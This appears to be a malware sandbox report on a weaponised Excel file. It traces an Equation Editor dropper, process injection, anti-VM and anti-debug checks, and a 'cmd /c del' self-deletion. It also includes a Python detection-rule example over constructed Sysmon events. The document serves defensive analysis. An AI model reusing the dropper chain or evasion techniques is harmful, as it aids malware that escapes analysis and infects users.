          Source: classification engine | Classification label: mal100.troj.expl.evad.winXLSX@13/3@2/2
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 9_2_4A563185 GetDiskFreeSpaceExW,
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Desktop\~$Request for quotation.xlsx
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\CVR1F71.tmp
          Source: C:\Users\Public\vbc.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File read: C:\Users\desktop.ini
          Source: C:\Users\Public\vbc.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: Request for quotation.xlsx | Virustotal: Detection: 33%
          Source: Request for quotation.xlsx | ReversingLabs: Detection: 22%
          Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
          Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: unknown | Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: unknown | Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
          Source: unknown | Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
          Source: unknown | Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
          Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
          Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exe | Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
          Source: C:\Users\Public\vbc.exe | Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
          Source: C:\Users\Public\vbc.exe | Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
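The process tree above is the whole detection story for this sample: EQNEDT32.EXE, an OLE server with no reason to write files or start programs, drops a PE into C:\Users\Public and executes it, and the payload later removes its dropper with cmd.exe /c del. The block below is an added example, not Joe Sandbox code and not the text of any Sigma rule, showing those conditions as rules over Sysmon-style process-creation (EventID 1) and file-creation (EventID 11) records. The event list is constructed to mirror the tree in this report; the parent of EQNEDT32.EXE, the quoting of the command lines and the SUSPICIOUS_DIRS list are assumptions.

```python
"""Flag the EQNEDT32.EXE dropper chain from process- and file-creation events.

Added example for this report, not Joe Sandbox or Sigma rule code. EVENTS is
constructed to mirror the process tree above using Sysmon field names; the
ParentImage of EQNEDT32.EXE and the exact command lines are assumed values.
"""
import ntpath

EQNEDT = "eqnedt32.exe"
# Assumed list of user-writable folders from which nothing should normally run.
SUSPICIOUS_DIRS = ("c:\\users\\public\\", "\\appdata\\local\\temp\\", "c:\\programdata\\")
DROPPED_EXT = (".exe", ".dll", ".scr", ".com")

EVENTS = [  # constructed
    {"EventID": 1, "Image": r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding'},
    {"EventID": 1, "Image": r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "ParentImage": r"C:\Windows\System32\svchost.exe",  # assumed: DCOM activation
     "CommandLine": r'"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding'},
    {"EventID": 11, "Image": r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "TargetFilename": r"C:\Users\Public\vbc.exe"},
    {"EventID": 1, "Image": r"C:\Users\Public\vbc.exe",
     "ParentImage": r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "CommandLine": r'"C:\Users\Public\vbc.exe"'},
    {"EventID": 1, "Image": r"C:\Windows\SysWOW64\cmd.exe",
     "ParentImage": r"C:\Windows\SysWOW64\cmd.exe",
     "CommandLine": r'/c del "C:\Users\Public\vbc.exe"'},
    {"EventID": 1, "Image": r"C:\Windows\System32\notepad.exe",  # benign control
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "notepad.exe"},
]

def basename(path):
    return ntpath.basename(path).lower()

def eqnedt_spawns_process(ev):
    """Equation Editor is an OLE server; it has no business starting children."""
    return ev["EventID"] == 1 and basename(ev["ParentImage"]) == EQNEDT

def eqnedt_writes_executable(ev):
    """Nor writing PE files anywhere on disk."""
    return (ev["EventID"] == 11 and basename(ev["Image"]) == EQNEDT
            and ev["TargetFilename"].lower().endswith(DROPPED_EXT))

def execution_from_suspicious_folder(ev):
    image = ev["Image"].lower()
    return ev["EventID"] == 1 and any(d in image for d in SUSPICIOUS_DIRS)

def cmd_self_delete(ev):
    """cmd.exe /c del <something>.exe: a payload removing its own dropper."""
    if ev["EventID"] != 1 or basename(ev["Image"]) != "cmd.exe":
        return False
    cmd = ev.get("CommandLine", "").lower()
    return "/c del " in cmd and cmd.rstrip("\"' ").endswith(".exe")

RULES = [eqnedt_spawns_process, eqnedt_writes_executable,
         execution_from_suspicious_folder, cmd_self_delete]

def evaluate(events):
    """Return (rule name, offending path) for every event that fires a rule."""
    hits = []
    for ev in events:
        for rule in RULES:
            if rule(ev):
                hits.append((rule.__name__, ev.get("TargetFilename") or ev["Image"]))
    return hits

if __name__ == "__main__":
    for name, path in evaluate(EVENTS):
        print(f"{name:34} {path}")
```

The first two rules are the high-confidence ones and need no tuning; the folder rule and the self-delete rule fire on some legitimate installers and updaters, so in production they are best used to raise the score of a process tree that already contains an Office or Equation Editor parent rather than as stand-alone alerts.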
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\Public\vbc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
          Source: Request for quotation.xlsxStatic file information: File size 2205696 > 1048576
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: cmd.pdb,$ source: vbc.exe, 00000007.00000003.2278081880.000000000093C000.00000004.00000001.sdmp
          Source: Binary string: cmd.pdb,$WJ6$WJ@$WJ source: vbc.exe, 00000007.00000003.2278106711.000000000097A000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdb source: vbc.exe, cmd.exe
          Source: Binary string: cmd.pdb source: vbc.exe, 00000007.00000003.2278106711.000000000097A000.00000004.00000001.sdmp, cmd.exe
          Source: Request for quotation.xlsx | Initial sample: OLE indicators vbamacros = False
          Source: Request for quotation.xlsx | Initial sample: OLE indicators encrypted = True
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 9_2_4A56D539 LoadLibraryW,GetProcAddress,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,
          Source: C:\Users\Public\vbc.exe | Code function: 7_2_0041797C push ecx; retf
          Source: C:\Users\Public\vbc.exe | Code function: 7_2_00417936 push esp; retf
          Source: C:\Users\Public\vbc.exe | Code function: 7_2_0040E3E7 push ebp; iretd
          Source: C:\Users\Public\vbc.exe | Code function: 7_2_00417C0D push ss; ret
          Source: C:\Users\Public\vbc.exe | Code function: 7_2_0041CEB5 push eax; ret
          Source: C:\Users\Public\vbc.exe | Code function: 7_2_0041CF6C push eax; ret
          Source: C:\Users\Public\vbc.exe | Code function: 7_2_0041CF02 push eax; ret
          Source: C:\Users\Public\vbc.exe | Code function: 7_2_0041CF0B push eax; ret
          Source: C:\Users\Public\vbc.exe | Code function: 7_2_0041D7C6 push cs; retf
          Source: C:\Users\Public\vbc.exe | Code function: 7_2_0041678C push 00000050h; retf
          Source: C:\Users\Public\vbc.exe | Code function: 7_2_00A3DFA1 push ecx; ret
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 9_2_4A5513B6 push ecx; ret
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 9_2_0229DFA1 push ecx; ret
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 9_2_0008E3E7 push ebp; iretd
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 9_2_0009678C push 00000050h; retf
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 9_2_0009D7C6 push cs; retf
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 9_2_00097936 push esp; retf
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 9_2_0009797C push ecx; retf
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 9_2_00097C0D push ss; ret
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 9_2_0009CEB5 push eax; ret
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 9_2_0009CF0B push eax; ret
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 9_2_0009CF02 push eax; ret
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 9_2_0009CF6C push eax; ret
          Source: winlog[1].exe.2.dr, P5DwVA3qsuUkgPHbBP/QL2lCfIvdfmBsg1VWG.cs | High entropy of concatenated method names: '.ctor', 'QL2IlCfvd', 'Dispose', 'dmB3sg1VW', 'X2E6MKCwtPqj5Hpe37', 'OLf8nmQmrKiEQVHYBH', 'G9pwjWchC9YkI7u9DR', 'eWLEtYHGPcPEetJgiw', 'SITVgja9hI131W2vxt', 'xIES5gTBPPHX9RsB8n'
          Source: winlog[1].exe.2.dr, tRMJiifKtEyxB4yw4q/h2uNghyeeLXI9bQAEC.cs | High entropy of concatenated method names: 'paVZkWOJ7', 'j8j6OabS7', 'TPUb2uNgh', 'VeLJXI9bQ', 'OECPWRMJi', 'AKtjEyxB4', 'dw4UqCLQJ', 'fMsLA8VCw', 'FqemQ9A4R', 'sxTMaVSoE'
          Source: vbc.exe.2.dr, P5DwVA3qsuUkgPHbBP/QL2lCfIvdfmBsg1VWG.cs | High entropy of concatenated method names: '.ctor', 'QL2IlCfvd', 'Dispose', 'dmB3sg1VW', 'X2E6MKCwtPqj5Hpe37', 'OLf8nmQmrKiEQVHYBH', 'G9pwjWchC9YkI7u9DR', 'eWLEtYHGPcPEetJgiw', 'SITVgja9hI131W2vxt', 'xIES5gTBPPHX9RsB8n'
          Source: vbc.exe.2.dr, tRMJiifKtEyxB4yw4q/h2uNghyeeLXI9bQAEC.cs | High entropy of concatenated method names: 'paVZkWOJ7', 'j8j6OabS7', 'TPUb2uNgh', 'VeLJXI9bQ', 'OECPWRMJi', 'AKtjEyxB4', 'dw4UqCLQJ', 'fMsLA8VCw', 'FqemQ9A4R', 'sxTMaVSoE'
          Source: 4.2.vbc.exe.30000.0.unpack, P5DwVA3qsuUkgPHbBP/QL2lCfIvdfmBsg1VWG.cs | High entropy of concatenated method names: '.ctor', 'QL2IlCfvd', 'Dispose', 'dmB3sg1VW', 'X2E6MKCwtPqj5Hpe37', 'OLf8nmQmrKiEQVHYBH', 'G9pwjWchC9YkI7u9DR', 'eWLEtYHGPcPEetJgiw', 'SITVgja9hI131W2vxt', 'xIES5gTBPPHX9RsB8n'
          Source: 4.2.vbc.exe.30000.0.unpack, tRMJiifKtEyxB4yw4q/h2uNghyeeLXI9bQAEC.cs | High entropy of concatenated method names: 'paVZkWOJ7', 'j8j6OabS7', 'TPUb2uNgh', 'VeLJXI9bQ', 'OECPWRMJi', 'AKtjEyxB4', 'dw4UqCLQJ', 'fMsLA8VCw', 'FqemQ9A4R', 'sxTMaVSoE'
          Source: 4.0.vbc.exe.30000.0.unpack, P5DwVA3qsuUkgPHbBP/QL2lCfIvdfmBsg1VWG.cs | High entropy of concatenated method names: '.ctor', 'QL2IlCfvd', 'Dispose', 'dmB3sg1VW', 'X2E6MKCwtPqj5Hpe37', 'OLf8nmQmrKiEQVHYBH', 'G9pwjWchC9YkI7u9DR', 'eWLEtYHGPcPEetJgiw', 'SITVgja9hI131W2vxt', 'xIES5gTBPPHX9RsB8n'
          Source: 4.0.vbc.exe.30000.0.unpack, tRMJiifKtEyxB4yw4q/h2uNghyeeLXI9bQAEC.cs | High entropy of concatenated method names: 'paVZkWOJ7', 'j8j6OabS7', 'TPUb2uNgh', 'VeLJXI9bQ', 'OECPWRMJi', 'AKtjEyxB4', 'dw4UqCLQJ', 'fMsLA8VCw', 'FqemQ9A4R', 'sxTMaVSoE'
          Source: 5.0.vbc.exe.30000.0.unpack, P5DwVA3qsuUkgPHbBP/QL2lCfIvdfmBsg1VWG.cs | High entropy of concatenated method names: '.ctor', 'QL2IlCfvd', 'Dispose', 'dmB3sg1VW', 'X2E6MKCwtPqj5Hpe37', 'OLf8nmQmrKiEQVHYBH', 'G9pwjWchC9YkI7u9DR', 'eWLEtYHGPcPEetJgiw', 'SITVgja9hI131W2vxt', 'xIES5gTBPPHX9RsB8n'
          Source: 5.0.vbc.exe.30000.0.unpack, tRMJiifKtEyxB4yw4q/h2uNghyeeLXI9bQAEC.cs | High entropy of concatenated method names: 'paVZkWOJ7', 'j8j6OabS7', 'TPUb2uNgh', 'VeLJXI9bQ', 'OECPWRMJi', 'AKtjEyxB4', 'dw4UqCLQJ', 'fMsLA8VCw', 'FqemQ9A4R', 'sxTMaVSoE'
          Source: 5.2.vbc.exe.30000.0.unpack, P5DwVA3qsuUkgPHbBP/QL2lCfIvdfmBsg1VWG.cs | High entropy of concatenated method names: '.ctor', 'QL2IlCfvd', 'Dispose', 'dmB3sg1VW', 'X2E6MKCwtPqj5Hpe37', 'OLf8nmQmrKiEQVHYBH', 'G9pwjWchC9YkI7u9DR', 'eWLEtYHGPcPEetJgiw', 'SITVgja9hI131W2vxt', 'xIES5gTBPPHX9RsB8n'
          Source: 5.2.vbc.exe.30000.0.unpack, tRMJiifKtEyxB4yw4q/h2uNghyeeLXI9bQAEC.cs | High entropy of concatenated method names: 'paVZkWOJ7', 'j8j6OabS7', 'TPUb2uNgh', 'VeLJXI9bQ', 'OECPWRMJi', 'AKtjEyxB4', 'dw4UqCLQJ', 'fMsLA8VCw', 'FqemQ9A4R', 'sxTMaVSoE'
          Source: 6.0.vbc.exe.30000.0.unpack, P5DwVA3qsuUkgPHbBP/QL2lCfIvdfmBsg1VWG.cs | High entropy of concatenated method names: '.ctor', 'QL2IlCfvd', 'Dispose', 'dmB3sg1VW', 'X2E6MKCwtPqj5Hpe37', 'OLf8nmQmrKiEQVHYBH', 'G9pwjWchC9YkI7u9DR', 'eWLEtYHGPcPEetJgiw', 'SITVgja9hI131W2vxt', 'xIES5gTBPPHX9RsB8n'
          Source: 6.0.vbc.exe.30000.0.unpack, tRMJiifKtEyxB4yw4q/h2uNghyeeLXI9bQAEC.cs | High entropy of concatenated method names: 'paVZkWOJ7', 'j8j6OabS7', 'TPUb2uNgh', 'VeLJXI9bQ', 'OECPWRMJi', 'AKtjEyxB4', 'dw4UqCLQJ', 'fMsLA8VCw', 'FqemQ9A4R', 'sxTMaVSoE'
          Source: 6.2.vbc.exe.30000.0.unpack, P5DwVA3qsuUkgPHbBP/QL2lCfIvdfmBsg1VWG.cs | High entropy of concatenated method names: '.ctor', 'QL2IlCfvd', 'Dispose', 'dmB3sg1VW', 'X2E6MKCwtPqj5Hpe37', 'OLf8nmQmrKiEQVHYBH', 'G9pwjWchC9YkI7u9DR', 'eWLEtYHGPcPEetJgiw', 'SITVgja9hI131W2vxt', 'xIES5gTBPPHX9RsB8n'
          Source: 6.2.vbc.exe.30000.0.unpack, tRMJiifKtEyxB4yw4q/h2uNghyeeLXI9bQAEC.cs | High entropy of concatenated method names: 'paVZkWOJ7', 'j8j6OabS7', 'TPUb2uNgh', 'VeLJXI9bQ', 'OECPWRMJi', 'AKtjEyxB4', 'dw4UqCLQJ', 'fMsLA8VCw', 'FqemQ9A4R', 'sxTMaVSoE'
          Source: 7.0.vbc.exe.30000.0.unpack, P5DwVA3qsuUkgPHbBP/QL2lCfIvdfmBsg1VWG.cs | High entropy of concatenated method names: '.ctor', 'QL2IlCfvd', 'Dispose', 'dmB3sg1VW', 'X2E6MKCwtPqj5Hpe37', 'OLf8nmQmrKiEQVHYBH', 'G9pwjWchC9YkI7u9DR', 'eWLEtYHGPcPEetJgiw', 'SITVgja9hI131W2vxt', 'xIES5gTBPPHX9RsB8n'
          Source: 7.0.vbc.exe.30000.0.unpack, tRMJiifKtEyxB4yw4q/h2uNghyeeLXI9bQAEC.cs | High entropy of concatenated method names: 'paVZkWOJ7', 'j8j6OabS7', 'TPUb2uNgh', 'VeLJXI9bQ', 'OECPWRMJi', 'AKtjEyxB4', 'dw4UqCLQJ', 'fMsLA8VCw', 'FqemQ9A4R', 'sxTMaVSoE'
          Source: 7.2.vbc.exe.30000.0.unpack, P5DwVA3qsuUkgPHbBP/QL2lCfIvdfmBsg1VWG.cs | High entropy of concatenated method names: '.ctor', 'QL2IlCfvd', 'Dispose', 'dmB3sg1VW', 'X2E6MKCwtPqj5Hpe37', 'OLf8nmQmrKiEQVHYBH', 'G9pwjWchC9YkI7u9DR', 'eWLEtYHGPcPEetJgiw', 'SITVgja9hI131W2vxt', 'xIES5gTBPPHX9RsB8n'
          Source: 7.2.vbc.exe.30000.0.unpack, tRMJiifKtEyxB4yw4q/h2uNghyeeLXI9bQAEC.cs | High entropy of concatenated method names: 'paVZkWOJ7', 'j8j6OabS7', 'TPUb2uNgh', 'VeLJXI9bQ', 'OECPWRMJi', 'AKtjEyxB4', 'dw4UqCLQJ', 'fMsLA8VCw', 'FqemQ9A4R', 'sxTMaVSoE'
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\vbc.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\vbc.exe

          Boot Survival:

          Drops PE files to the user root directory
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\vbc.exe

          Hooking and other Techniques for Hiding and Protection:

          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: explorer.exe | User mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8F 0xFE 0xE5
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: Request for quotation.xlsx | Stream path 'EncryptedPackage' entropy: 7.99990143991 (max. 8.0)

          Malware Analysis System Evasion:

          Yara detected AntiVM_3
          Source: Yara match | File source: Process Memory Space: vbc.exe PID: 2924, type: MEMORY
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: vbc.exe, 00000004.00000002.2249509307.0000000003419000.00000004.00000001.sdmp | Binary or memory string: SBIEDLL.DLLHEADKCREATEOBJECT("WSCRIPT.SHELL").RUN """
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\Public\vbc.exe | RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\Public\vbc.exe | RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmd.exe | RDTSC instruction interceptor: First address: 00000000000898E4 second address: 00000000000898EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmd.exe | RDTSC instruction interceptor: First address: 0000000000089B5E second address: 0000000000089B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\Public\vbc.exe | Code function: 7_2_00409A90 rdtsc
          Source: C:\Users\Public\vbc.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2400 | Thread sleep time: -420000s >= -30000s
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2400 | Thread sleep time: -60000s >= -30000s
          Source: C:\Users\Public\vbc.exe TID: 2912 | Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 1928 | Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\explorer.exe | Last function: Thread delayed
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 9_2_4A556E47 GetFileAttributesW,FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 9_2_4A552E73 FindFirstFileExW,GetLastError,FindClose,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 9_2_4A570202 FindFirstFileW,GetFullPathNameW,RemoveDirectoryW,RemoveDirectoryW,GetLastError,GetLastError,GetFileAttributesW,SetFileAttributesW,RemoveDirectoryW,GetLastError,
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 9_2_4A56BF0C FindFirstFileW,FindNextFileW,FindClose,
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 9_2_4A55BBA4 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,FindNextFileW,GetLastError,FindClose,
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 9_2_4A570492 FindFirstFileW,FindFirstFileW,FindClose,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetLastError,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,FindNextFileW,FindClose,
          Source: explorer.exe, 00000008.00000000.2251278805.00000000001F5000.00000004.00000020.sdmp | Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000008.00000000.2257941915.0000000004263000.00000004.00000001.sdmp | Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ies
          Source: vbc.exe, 00000004.00000002.2249509307.0000000003419000.00000004.00000001.sdmp | Binary or memory string: vmware
          Source: explorer.exe, 00000008.00000000.2257823360.00000000041AD000.00000004.00000001.sdmp | Binary or memory string: ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0
          Source: explorer.exe, 00000008.00000000.2251408426.0000000000231000.00000004.00000020.sdmp | Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}
          Source: C:\Users\Public\vbc.exe | Process information queried: ProcessInformation
          Source: C:\Users\Public\vbc.exe | Process queried: DebugPort
          Source: C:\Windows\SysWOW64\cmd.exe | Process queried: DebugPort
          Source: C:\Users\Public\vbc.exe | Code function: 7_2_00409A90 rdtsc
          Source: C:\Users\Public\vbc.exe | Code function: 7_2_0040ACD0 LdrLoadDll,
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 9_2_4A56D539 LoadLibraryW,GetProcAddress,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,
          Source: C:\Users\Public\vbc.exe | Code function: 7_2_00A20080 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\Public\vbc.exe | Code function: 7_2_00A200EA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\vbc.exe | Code function: 7_2_00A426F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 9_2_02280080 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 9_2_022800EA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 9_2_022A26F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 9_2_4A552E73 FindFirstFileExW,GetLastError,FindClose,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,
          Source: C:\Users\Public\vbc.exe | Process token adjusted: Debug
